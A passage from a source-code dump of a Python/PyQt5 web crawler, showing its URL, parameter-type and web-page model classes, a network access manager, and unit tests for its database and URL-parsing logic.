44 |   


--------------------------------------------------------------------------------
/crawler/models/parametertype.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | from enum import Enum
19 | 
20 | __author__ = 'constantin'
21 | 
22 | class ParameterType(Enum):
23 |     """
24 |     This describes the type of the parameters:
25 |         - Digit: Single digit, exp: 0,1,2, ...
26 |         - Float: Float value, exp: 1.5, 99,32, 3,1415...
27 |         - Char; Single digit, float or character, exp: a, B, X, 5, ...
28 |         - Integer: Normal Integer > 9, exp, 23, 39, 42, ...
29 |         - String: String contains only Characters, exp: Turing, Captain Jack
30 |         - Alpha-Numerical: Contains the rest, exp: diofjiodjr23jreß9324jr3j0ew9rj 0r9 j3029j
31 | 
32 |     """
33 |     Digit = 0
34 |     Float = 1
35 |     Char = 2
36 |     Integer = 3
37 |     String = 4
38 |     AlphaNumerical = 5
39 |     NoParameter = 6
40 | 


--------------------------------------------------------------------------------
/crawler/models/timingrequest.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | 
19 | from models.asyncrequests import AsyncRequests
20 | 
21 | 
22 | class TimingRequest(AsyncRequests):
23 |     '''
24 |     Models an Ajax-Request issued after timeout or intervall
25 |     '''
26 |     def __init__(self, method, url, time, event, parameters=None):
27 |         super(TimingRequest, self).__init__(method, url, parameters)
28 |         self.event = event #Timout or Intervall
29 |         self.time = time
30 | 
31 |     def toString(self):
32 |         return "[Timing - Method: " + str(self.method) + " - Url: "+ str(self.url.toString()) + " - Trigger: " + str(self.event) + "]"
33 | 


--------------------------------------------------------------------------------
/crawler/models/url.py:
--------------------------------------------------------------------------------
  1 | '''
  2 | Copyright (C) 2015 Constantin Tschuertz
  3 | 
  4 | This program is free software: you can redistribute it and/or modify
  5 | it under the terms of the GNU General Public License as published by
  6 | the Free Software Foundation, either version 3 of the License, or
  7 | any later version.
  8 | 
  9 | This program is distributed in the hope that it will be useful,
 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 12 | GNU General Public License for more details.
 13 | 
 14 | You should have received a copy of the GNU General Public License
 15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
 16 | '''
 17 | 
 18 | import hashlib
 19 | from urllib.parse import urlparse
 20 | 
 21 | 
 22 | class Url():
 23 |     def __init__(self, url, depth_of_finding = None):
 24 |         self.complete_url = url
 25 |         parsed_url = urlparse(url)
 26 |         self.scheme = parsed_url.scheme
 27 |         self.domain = parsed_url.netloc
 28 |         if parsed_url.path != "/":
 29 |             self.path = parsed_url.path
 30 |         else:
 31 |             self.path = ""
 32 |         self.query = parsed_url.query
 33 |         self.fragment = parsed_url.fragment
 34 | 
 35 |         self.parameters = {}
 36 |         self.depth_of_finding = depth_of_finding
 37 |         self.url_structure = None
 38 |         self.abstract_url = None
 39 | 
 40 |         if len(parsed_url.query) > 0:
 41 |             query_splitted = self.query.split("&")
 42 |             for splits in query_splitted:
 43 |                 tmp = splits.split("=")
 44 |                 if len(tmp) == 2:
 45 |                     param_name = tmp[0]
 46 |                     param_value = tmp[1]
 47 |                 else:
 48 |                     param_name = tmp[0]
 49 |                     param_value = None
 50 |                 if param_name in self.parameters:
 51 |                     self.parameters[param_name].append(param_value)
 52 |                 else:
 53 |                     self.parameters[param_name] = [param_value]
 54 |             keys = self.parameters.keys()
 55 |             keys = sorted(keys)
 56 |             tmp_params = {}
 57 |             for key in keys:
 58 |                 tmp_params[key] = self.parameters[key]
 59 |             self.parameters = tmp_params
 60 | 
 61 |         self.url_hash = self.get_hash()
 62 | 
 63 |     def get_values_to_parameter(self, parameter_name):
 64 |         if parameter_name not in self.parameters:
 65 |             raise KeyError("{} is not in parameters".format(parameter_name))
 66 |         return self.parameters[parameter_name]
 67 | 
 68 |     def get_url_description(self):
 69 |         return self.url_structure
 70 | 
 71 |     def get_path(self):
 72 |         result = self.scheme + "://" + self.domain
 73 |         if self.path is not None and len(self.path) > 0:
 74 |             if self.path[0] == "/":
 75 |                 result = self.scheme + "://" + self.domain + self.path
 76 |             else:
 77 |                 result = self.scheme + "://" + self.domain + "/" + self.path
 78 |             return result
 79 |         else:
 80 |             return ""
 81 | 
 82 |     def get_hash(self):
 83 |         s_to_hash = self.path
 84 |         for k in self.parameters:
 85 |             s_to_hash += "++" + k
 86 |         b_to_hash = s_to_hash.encode("utf-8")
 87 |         d = hashlib.md5()
 88 |         d.update(b_to_hash)
 89 |         return d.hexdigest()
 90 | 
 91 |     def toString(self):
 92 |         return self.complete_url
 93 | 
 94 |     def has_equal_description(self, other):
 95 |         if not isinstance(other, self.___class__):
 96 |             return False
 97 |         return self.url_hash == other.url_hash
 98 | 
 99 |     def equal_abstract_url(self, other):
100 |         if not isinstance(other, self.__class__):
101 |             return False
102 |         return self.abstract_url == other.abstract_url
103 | 
104 |     def __eq__(self, other):
105 |         if not isinstance(other, self.__class__):
106 |             return False
107 |         return self.toString() == other.toString()
108 | 
109 |     def __ne__(self, other):
110 |         return not self.__eq__(other)        


--------------------------------------------------------------------------------
/crawler/models/urlstructure.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | from enum import Enum
19 | import hashlib
20 | from models.parametertype import ParameterType
21 | 
22 | __author__ = 'constantin'
23 | 
24 | 
25 | class UrlStructure():
26 | 
27 |     def __init__(self, path, paramters = {}, url_hash = None):
28 |         self.path = path
29 |         self.parameters = paramters # List of dict: parametername, parametertype, origin, generating <= change of the param creates a new page
30 |         self.url_hash = url_hash
31 | 
32 |     def get_parameter_type(self, parameter_name):
33 |         if parameter_name not in self.parameters:
34 |             raise KeyError("{} not found".format(parameter_name))
35 |         return ParameterType(self.parameters[parameter_name]['parameter_type'])
36 | 
37 |     def get_parameter_origin(self, parameter_name):
38 |         if parameter_name not in self.parameters:
39 |             raise KeyError("{} not found".format(parameter_name))
40 |         return ParameterType(self.parameters[parameter_name]['origin'])
41 | 
42 |     def toString(self):
43 |         msg = "[Url: {} \n".format(self.path)
44 |         for param in self.parameters:
45 |             msg += "{} - {} - {} - {} \n".format(param, ParameterType(self.parameters[param]['parameter_type']), ParameterOrigin(self.parameters[param]['origin']), self.parameters[param]['generating'])
46 |         msg += "Hash: {}]".format(self.url_hash)
47 |         return msg
48 | 
49 | class ParameterOrigin(Enum):
50 |     ServerGenerated = 0
51 |     ClientGenerated = 1
52 | 
53 | 


--------------------------------------------------------------------------------
/crawler/models/utils.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | from enum import Enum
19 | 
20 | 
21 | def levenshtein(s1, s2):
22 |     if len(s1) < len(s2):
23 |         return levenshtein(s2, s1)
24 |  
25 |     # len(s1) >= len(s2)
26 |     if len(s2) == 0:
27 |         return len(s1)
28 |  
29 |     previous_row = range(len(s2) + 1)
30 |     for i, c1 in enumerate(s1):
31 |         current_row = [i + 1]
32 |         for j, c2 in enumerate(s2):
33 |             insertions = previous_row[j + 1] + 1 # j+1 instead of j since previous_row and current_row are one character longer
34 |             deletions = current_row[j] + 1       # than s2
35 |             substitutions = previous_row[j] + (c1 != c2)
36 |             current_row.append(min(insertions, deletions, substitutions))
37 |         previous_row = current_row
38 |  
39 |     return previous_row[-1]
40 | 
41 | 
42 | class CrawlSpeed(Enum):
43 |     Slow = 0
44 |     Medium = 1
45 |     Fast = 2
46 |     Speed_of_Lightning = 3        
47 |         
48 | 
49 | def purge_dublicates(X):
50 |     unique_X = []
51 |     for i, row in enumerate(X):
52 |         if row not in X[i + 1:]:
53 |             unique_X.append(row)
54 |     return unique_X


--------------------------------------------------------------------------------
/crawler/models/webpage.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | class WebPage:
19 |     
20 |     def __init__(self, id, url = None, html = None, cookiesjar = None, depth = None, base_url = None):
21 |         self.id = id
22 |         self.cookiejar = cookiesjar
23 |         self.url = url
24 |         self.html = html
25 |         self.clickables = []
26 |         self.timing_requests = []
27 |         self.links = []
28 |         self.forms = []
29 |         self.current_depth = depth
30 |         self.ajax_requests = []
31 |         self.base_url = None # Defines if a page contains a <base> tag
32 |         
33 |     def toString(self):
34 |         try:
35 |             url = self.url.toString()
36 |         except AttributeError:
37 |             url = self.url
38 |         msg = "[ Page: " + url + " - ID: " + str(self.id) + " - Depth:" + str(self.current_depth) + " \n"
39 |         if len(self.clickables) > 0: 
40 |             msg += "Clickable: \n"
41 |             for elem in self.clickables:
42 |                 msg += elem.toString() + " \n"
43 |         if len(self.timing_requests) > 0:
44 |             msg += "Timingrequests: \n"
45 |             for elem in self.timing_requests:
46 |                 msg += elem.toString() + " \n"
47 |         if len(self.links) > 0: 
48 |             msg += "Static Links: \n"
49 |             for link in self.links:
50 |                 tmp = link.toString()
51 |                 msg += tmp + " \n"
52 |         if len(self.forms) > 0: 
53 |             msg += "Forms: \n"
54 |             for elem in self.forms:
55 |                 msg += elem.toString() + " \n"
56 |         if len(self.ajax_requests) > 0: 
57 |             msg += "Ajax-AsyncRequests: \n"
58 |             for elem in self.ajax_requests:
59 |                 msg += elem.toString() + " \n"
60 |         return msg + "]"
61 |     


--------------------------------------------------------------------------------
/crawler/network/__init__.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | 


--------------------------------------------------------------------------------
/crawler/network/network.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | from PyQt5.Qt import QNetworkAccessManager, QDesktopServices, QNetworkDiskCache
19 | import logging
20 | from PyQt5.QtNetwork import QHttpMultiPart, QHttpPart
21 | 
22 | 
23 | class NetWorkAccessManager(QNetworkAccessManager):
24 |     
25 |     def __init__(self, parent, cache_size = 100, cache_dir='.webkit_cache'):
26 |         super(NetWorkAccessManager, self).__init__(parent)
27 |         self.finished.connect(self._finished) 
28 |         cache = QNetworkDiskCache()
29 |         cache.setCacheDirectory(cache_dir)
30 |         cache.setMaximumCacheSize(cache_size * 1024 * 1024) # need to convert cache value to bytes
31 |         self.setCache(cache)
32 |         
33 |     def _finished(self, reply):
34 |         reply.deleteLater()
35 |         
36 |     def createRequest(self, op, req, device=None):
37 |         self.reply = None
38 |         """
39 |         if op == 1:
40 |             logging.debug("NetworkAccessManager: Request created - Operation: {}, Url: {}".format("Head",req.url().toString()))
41 |         elif op == 2:
42 |             logging.debug("NetworkAccessManager: Request created - Operation: {}, Url: {}".format("GET",req.url().toString()))
43 |         elif op == 3:
44 |             logging.debug("NetworkAccessManager: Request created - Operation: {}, Url: {}".format("PUT",req.url().toString()))
45 |         elif op == 4:
46 |             logging.debug("NetworkAccessManager: Request created - Operation: {}, Url: {}".format("POST",req.url().toString()))
47 |         elif op == 5:
48 |             logging.debug("NetworkAccessManager: Request created - Operation: {}, Url: {}".format("Delete",req.url().toString()))
49 |         else:
50 |             logging.debug("NetworkAccessManager: Request created - Operation: {}, Url: {}".format("CUSTOM",req.url().toString()))
51 |         """
52 |         reply = QNetworkAccessManager.createRequest(self, op, req, device)
53 |         #reply = NetworkReply(self, reply)
54 |         return reply
55 | 
56 |     def __del__(self):
57 |         self = None
58 | 


--------------------------------------------------------------------------------
/crawler/tests/__init__.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | __author__ = 'constantin'
19 | 


--------------------------------------------------------------------------------
/crawler/tests/databasetest.py:
--------------------------------------------------------------------------------
  1 | ﻿'''
  2 | Copyright (C) 2015 Constantin Tschuertz
  3 | 
  4 | This program is free software: you can redistribute it and/or modify
  5 | it under the terms of the GNU General Public License as published by
  6 | the Free Software Foundation, either version 3 of the License, or
  7 | any later version.
  8 | 
  9 | This program is distributed in the hope that it will be useful,
 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 12 | GNU General Public License for more details.
 13 | 
 14 | You should have received a copy of the GNU General Public License
 15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
 16 | '''
 17 | 
 18 | import logging
 19 | from copy import deepcopy
 20 | from database.database import Database
 21 | from models.ajaxrequest import AjaxRequest
 22 | from models.clickable import Clickable
 23 | from models.clickabletype import ClickableType
 24 | from models.form import HtmlForm, FormInput
 25 | from models.url import Url
 26 | from models.webpage import WebPage
 27 | 
 28 | __author__ = 'constantin'
 29 | 
 30 | import unittest
 31 | 
 32 | SESSION = 12345
 33 | WEBPAGE_ID = 99
 34 | TEST_URL1 = "http://example.com"
 35 | TEST_URL2 = "http://example.com/exmaple.php"
 36 | TEST_HTML = "<html><head></head><body></body></html>"
 37 | CLICKABLE = Clickable("click", "a", "body/div/div/a", id = "Test1", html_class = "Test2", clickable_depth = 243, function_id = "Test3")
 38 | WEBPAGE = WebPage(1, url= TEST_URL1, html= TEST_HTML, cookiesjar= None, depth= 24, base_url= TEST_URL2)
 39 | AJAXREQUEST = AjaxRequest("GET", TEST_URL1, CLICKABLE, parameters=["test=Test"])
 40 | 
 41 | 
 42 | class DataBaseTests(unittest.TestCase):
 43 | 
 44 |     def setUp(self):
 45 |         self.database = Database("DataBaseUnit")
 46 | 
 47 | 
 48 |     def test_url_set_and_get(self):
 49 |         url = Url(TEST_URL1, depth_of_finding=3)
 50 |         self.database.insert_url_into_db(SESSION, url)
 51 |         url2 = self.database.get_next_url_for_crawling(SESSION)
 52 |         self.assertEqual(url, url2)
 53 |         self.assertEqual(url2.depth_of_finding, 3)
 54 | 
 55 |     def test_url_visit(self):
 56 |         url1 = Url(TEST_URL1, depth_of_finding=3)
 57 |         url2 = Url(TEST_URL2, depth_of_finding=25)
 58 | 
 59 |         self.database.insert_url_into_db(SESSION, url1)
 60 |         self.database.insert_url_into_db(SESSION, url2)
 61 | 
 62 |         url3 = self.database.get_next_url_for_crawling(SESSION)
 63 |         self.database.visit_url(SESSION, url3, 25, 200)
 64 |         url4 = self.database.get_next_url_for_crawling(SESSION)
 65 | 
 66 |         self.assertEqual(url1, url3)
 67 |         self.assertEqual(url2, url4)
 68 | 
 69 |     def test_url_set(self):
 70 |         url1 = Url(TEST_URL1, depth_of_finding=3)
 71 |         url2 = Url(TEST_URL2, depth_of_finding=25)
 72 | 
 73 |         self.database.insert_url_into_db(SESSION, url1)
 74 |         self.assertEqual(self.database.urls.count(), 1)
 75 |         self.database.insert_url_into_db(SESSION, url1)
 76 |         self.assertEqual(self.database.urls.count(), 1)
 77 |         self.database.insert_url_into_db(SESSION, url2)
 78 |         self.assertEqual(self.database.urls.count(), 2)
 79 | 
 80 | 
 81 |     def test_clickables(self):
 82 |         clickable1 = Clickable("click", "a", "body/div/div/a", id = "Test1", html_class = "Test2", clickable_depth = 243, function_id = "Test3")
 83 |         self.database._insert_clickable_into_db(SESSION, WEBPAGE_ID, clickable1)
 84 | 
 85 |         clickables = self.database.get_all_clickables_to_page_id_from_db(SESSION,WEBPAGE_ID)
 86 |         self.assertEqual(len(clickables), 1)
 87 |         self.assertEqual(clickable1, clickables[0])
 88 |         
 89 |         self.database.set_clickable_clicked(SESSION, WEBPAGE_ID, clickable1.dom_address, clickable1.event, clickable_depth=243, clickable_type=ClickableType.CreatesNewNavigatables)
 90 | 
 91 |         clickables = self.database.get_all_clickables_to_page_id_from_db(SESSION,WEBPAGE_ID)
 92 |         self.assertEqual(len(clickables), 1)
 93 |         clickable1.clicked = True
 94 |         clickable1.clickable_type = ClickableType.CreatesNewNavigatables
 95 |         self.assertEqual(clickable1, clickables[0])
 96 | 
 97 |     def test_webpage(self):
 98 |         clickable1 = Clickable("click", "a", "body/div/div/a", id = "Test1", html_class = "Test2", clickable_depth = 243, function_id = "Test3")
 99 |         web_page = WebPage(1, url= TEST_URL1, html= TEST_HTML, cookiesjar= None, depth= 24, base_url= TEST_URL2)
100 |         web_page.clickables.extend([clickable1])
101 |         self.database.insert_page_into_db(SESSION, web_page)
102 |         web_page1 = self.database.get_webpage_to_id_from_db(SESSION, 1)
103 |         self.assertEqual(web_page.toString(), web_page1.toString())
104 |         web_page2 = self.database.get_webpage_to_url_from_db(SESSION, TEST_URL1)
105 |         self.assertEqual(web_page.toString(), web_page2.toString())
106 | 
107 |     def test_form1(self):
108 |         form_input1 = FormInput("INPUT", "Username", input_type="text", values=None)
109 |         form_input2 = FormInput("INPUT", "Password", input_type="password", values=None)
110 |         form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)
111 | 
112 |         self.database.insert_form(SESSION,form, WEBPAGE_ID)
113 |         self.assertEqual(self.database.forms.count(), 1)
114 |         form1 = self.database.get_all_forms_to_page_id_from_db(SESSION,WEBPAGE_ID)
115 |         self.assertEqual(form, form1[0])
116 |         self.assertEqual(form.toString(), form1[0].toString())
117 | 
118 |     def test_similar_forms(self):
119 |         form_input1 = FormInput("INPUT", "Test1", input_type="text", values=["Thomas"])
120 |         form_input2 = FormInput("INPUT", "Test2", input_type="text", values=["Mueller"])
121 |         form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)
122 |         self.database.insert_form(SESSION,form, WEBPAGE_ID)
123 |         self.assertEqual(self.database.forms.count(), 1)
124 | 
125 |         form_input1 = FormInput("INPUT", "Test1", input_type="text", values=["Edgar"])
126 |         form_input2 = FormInput("INPUT", "Test2", input_type="text", values=["Mueller"])
127 |         form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)
128 |         self.database.insert_form(SESSION,form, WEBPAGE_ID)
129 |         self.assertEqual(self.database.forms.count(), 1)
130 | 
131 |         form_input1 = FormInput("INPUT", "Test1", input_type="text", values=["Thomas, Edgar"])
132 |         form_input2 = FormInput("INPUT", "Test2", input_type="text", values=["Mueller"])
133 |         form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)
134 |         self.database.insert_form(SESSION,form, WEBPAGE_ID)
135 |         self.assertEqual(self.database.forms.count(), 1)
136 | 
137 | 
138 |         expected_form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)
139 |         form1 = self.database.get_all_forms_to_page_id_from_db(SESSION,WEBPAGE_ID)[0]
140 |         self.assertEqual(form1.toString(), expected_form.toString())
141 | 
142 |     def test_not_similar_forms(self):
143 |         form_input1 = FormInput("INPUT", "Test1", input_type="text", values=["Thomas"])
144 |         form_input2 = FormInput("INPUT", "Test3", input_type="text", values=["Mueller"])
145 |         form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)
146 |         self.database.insert_form(SESSION,form, WEBPAGE_ID)
147 |         self.assertEqual(self.database.forms.count(), 1)
148 | 
149 |         form_input1 = FormInput("INPUT", "Test1", input_type="text", values=["Edgar"])
150 |         form_input2 = FormInput("INPUT", "Test2", input_type="text", values=["Mueller"])
151 |         form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)
152 |         self.database.insert_form(SESSION,form, WEBPAGE_ID)
153 |         self.assertEqual(self.database.forms.count(), 2)
154 | 
155 |     def test_web_page_extend_ajax(self):
156 |         web_page = deepcopy(WEBPAGE)
157 |         clickable = deepcopy(CLICKABLE)
158 |         web_page.clickables.extend([clickable])
159 |         self.database.insert_page_into_db(SESSION, web_page)
160 |         ajax = deepcopy(AJAXREQUEST)
161 |         self.database.extend_ajax_requests_to_webpage(SESSION, web_page, [ajax])
162 | 
163 |         web_page.ajax_requests = [ajax]
164 |         test_page = self.database.get_webpage_to_url_from_db(SESSION, web_page.url)
165 |         self.assertEqual(web_page.toString(),test_page.toString())
166 |         self.assertEqual(web_page.ajax_requests[0], ajax)
167 | 
168 | 
169 | 
170 | if __name__ == '__main__':
171 |     unittest.main()
172 | 


--------------------------------------------------------------------------------
/crawler/tests/domainhandlertest.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | from database.databasemanager import DatabaseManager
19 | from models.urlstructure import ParameterType
20 | from utils.domainhandler import DomainHandler
21 | from utils.user import User
22 | 
23 | __author__ = 'constantin'
24 | 
25 | import unittest
26 | 
27 | 
28 | class DomainHandlerTest(unittest.TestCase):
29 | 
30 |     def setUp(self):
31 |         self.persistence_manager = DatabaseManager(User("DummyUser", 0))
32 |         self.domain_handler = DomainHandler("example.com", self.persistence_manager)
33 | 
34 |     def test_a_parameter_calculation(self):
35 |         self.assertEqual(self.domain_handler.calculate_new_url_type(None, "a"), ParameterType.Char)
36 |         self.assertEqual(self.domain_handler.calculate_new_url_type(None, "4"), ParameterType.Digit)
37 |         self.assertEqual(self.domain_handler.calculate_new_url_type(None, "afd"), ParameterType.String)
38 |         self.assertEqual(self.domain_handler.calculate_new_url_type(None, "1.5"), ParameterType.Float)
39 |         self.assertEqual(self.domain_handler.calculate_new_url_type(None, "42342"), ParameterType.Integer)
40 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "a"), ParameterType.Char)
41 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "1"), ParameterType.Digit)
42 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "12"), ParameterType.Integer)
43 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "42.5"), ParameterType.Float)
44 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "abc"), ParameterType.AlphaNumerical)
45 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "abc123"), ParameterType.AlphaNumerical)
46 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "a"), ParameterType.AlphaNumerical)
47 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "1"), ParameterType.Float)
48 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "1.5"), ParameterType.Float)
49 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "abc"), ParameterType.AlphaNumerical)
50 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "abc123"), ParameterType.AlphaNumerical)
51 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "17"), ParameterType.Float)
52 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "17.5"), ParameterType.Float)
53 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Integer, "a"), ParameterType.AlphaNumerical)
54 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Integer, "14"), ParameterType.Integer)
55 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Integer, "14.5"), ParameterType.Float)
56 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Integer, "abc123"), ParameterType.AlphaNumerical)
57 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "a"), ParameterType.Char)
58 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "4"), ParameterType.Char)
59 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "14"), ParameterType.AlphaNumerical)
60 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "14.5"), ParameterType.AlphaNumerical)
61 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "abc"), ParameterType.AlphaNumerical)
62 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "abc123"), ParameterType.AlphaNumerical)
63 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.String, "a"), ParameterType.String)
64 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.String, "abc"), ParameterType.String)
65 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.String, "1"), ParameterType.AlphaNumerical)
66 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.String, "2.3"), ParameterType.AlphaNumerical)
67 |         self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.String, "abc123"), ParameterType.AlphaNumerical)
68 | 
69 | 
70 |     def test_b_create_url_function(self):
71 |         url = self.domain_handler.handle_url("http://example.com/test.php?a=5&b=abc")
72 |         url_desc = self.persistence_manager.get_url_structure(url.url_hash)
73 |         self.assertEqual(url_desc.get_parameter_type("b"), ParameterType.String)
74 |         self.assertEqual(url_desc.get_parameter_type("a"), ParameterType.Digit)
75 |         self.assertEqual(url.get_values_to_parameter("a")[0], "5")
76 |         self.assertEqual(url.get_values_to_parameter("b")[0], "abc")
77 | 
78 | 
79 |         url = self.domain_handler.handle_url("test.php?a=7&b=abc123", "http://example.com")
80 |         url_desc = self.persistence_manager.get_url_structure(url.url_hash)
81 |         self.assertEqual(url_desc.get_parameter_type("b"), ParameterType.AlphaNumerical)
82 |         self.assertEqual(url_desc.get_parameter_type("a"), ParameterType.Digit)
83 |         self.assertEqual(url.domain, "example.com")
84 |         self.assertEqual(url.path, "/test.php")
